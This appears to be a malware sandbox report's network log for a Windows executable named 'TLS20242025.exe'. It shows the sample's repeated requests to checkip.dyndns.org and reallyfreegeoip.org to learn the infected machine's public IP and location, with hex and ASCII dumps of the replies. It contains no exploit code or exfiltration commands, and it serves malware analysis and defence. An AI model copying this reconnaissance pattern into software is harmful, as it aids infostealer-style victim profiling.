                                                Sep 26, 2024 15:19:12.837373972 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 15:19:13.314461946 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:13 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 5df794ccc3050227ea5a1136b1788ea0
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.649729193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 15:19:13.940435886 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 15:19:14.406107903 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:14 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 2fcf826f586bf0a43dd8fe703b489b24
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.649731193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 15:19:15.035927057 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 15:19:15.511804104 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: a3654867a6516020d112f6cf1a75780b
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649713188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:07 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 13:19:07 UTC686INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:07 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21579
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTRRy9pqdvNda4OYtmPa2f7C6i%2Bb1EEvI0En0cUAfWwaNVWhZveBaLsF%2BkI%2BiaY4UJ%2Bb6z%2F%2FUum7fzY4x5JKw2Y%2F%2FCA1ucGZieT8hIx9u8Zc2xuwxBGczzfKdRyMHxr8CJFrWn8d"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b386ae58c9c-EWR
                                                2024-09-26 13:19:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649715188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:08 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-09-26 13:19:08 UTC682INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:08 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21580
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvHeE%2B%2FaBdGooO24d0kOwGaK97GDt7mJ%2BEQRlx0C%2BuSAbNoMYPLmyIK6dCXVubzaPeItyp6Nu6CHPN1qauApuDjBBfkkJkH8z%2B5LGx0NZIDYDCtIvf79m9XWvVU748EPqWPy%2BxPh"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b3d0c7642b1-EWR
                                                2024-09-26 13:19:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.649718188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:09 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 13:19:09 UTC686INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:09 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21581
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJbkNcUhR%2FnwGsP6tfeMsokYz1wHTf0EgR%2FMKlKIbCIFikAc%2F55R%2FGh3F7F7IDhodQ1dn%2FD3TsGsbezdtYQyoX6zUfHlt0a4aH9hJe91%2F4Yu%2BagtRo%2FlQup4cYi7w8u1ZRHJA6l7"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b444c9e42e0-EWR
                                                2024-09-26 13:19:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.649720188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:10 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-09-26 13:19:10 UTC676INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:10 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21582
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JKFsg3ZSbPsjlWJmqD6WbRlxlZ7FWfPojNsWZU%2F67xHVUajNSrFNH9RnuuFllV0QuHERR2uyLRpeH5mF6RHmff5UliulQAvZgQG2DRCLu9nYXYmE0cCXey%2B8ZG2uzNfkKhcDod%2Fh"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b4b1bca8c81-EWR
                                                2024-09-26 13:19:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.649724188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-09-26 13:19:11 UTC674INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:11 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21583
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qn0lnc%2B%2FxiQRV6xK67P4YWyAM94vv16GTTvgRrP5k1gG0nP5fzKFbEOQ2XG4aKmfy0pdIpWl7KrKfI92WPut9r3vzHn5IJHvG9cZBnvm9xA3bkfXp1EBu2q2mqAokGeTX0o1KGTH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b51f98443f2-EWR
                                                2024-09-26 13:19:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.649726188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 13:19:12 UTC680INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:12 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21584
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIHXYVAiroAN7gFdXAr%2FrgMA977DLIRlFxdi5Z5xuBXj0z7vf%2FzqMabv88%2BQAb6faXyANwhLzu6cdL9QfTqt5fmJFlyWJHEY5JXl4hzqUswp%2FNNdEk7TMSd5BALOZSI%2FZ4fmCqiy"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b58cd4e0cc2-EWR
                                                2024-09-26 13:19:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.649728188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 13:19:13 UTC672INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:13 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21585
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CeDojy6P8%2BQ6lflm2FrwJjsuzV3qrUc2ON87cRXwfiNKBAWAAmsUSgcRkE6fC5ZPrSzByPX56h4mT09LGaFf10Ku19A7OFDS1pNweCKVDme13rwMner4oYZfgTHjEIk52oqRgtcM"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b5fadf3c477-EWR
                                                2024-09-26 13:19:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.649730188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:14 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 13:19:15 UTC678INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:14 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21586
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uaBpVlNQPzMVfNS98dUe0MIL4jhlERhbqeKh7LeK3fho%2BpLEO85%2FuCxa6fj0lyV%2F3IVfqBgIT1QNCtOLmlWQ0zLQ84Er2MFqEYJ%2BmTwQX0r9qqVPjoRg9EXKsqX8h0QPPy05lVf"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b667f0c72c2-EWR
                                                2024-09-26 13:19:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.649733188.114.97.34435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:15 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 13:19:16 UTC680INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:16 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 21588
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICtgGlyPwFY6wZti%2BKXA5TRxb5Kn9Vx7PEYi8A%2BGPZnKfH2kTpiT1cBjpFMsMgOocvkEoqRyUFt%2FtjyYHEIaqNNd8ftBCawuRbxY3OeLTGG%2FnLxBAOqqUTCecdUGS7VVjXN0%2BPwD"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c938b6d6a167d11-EWR
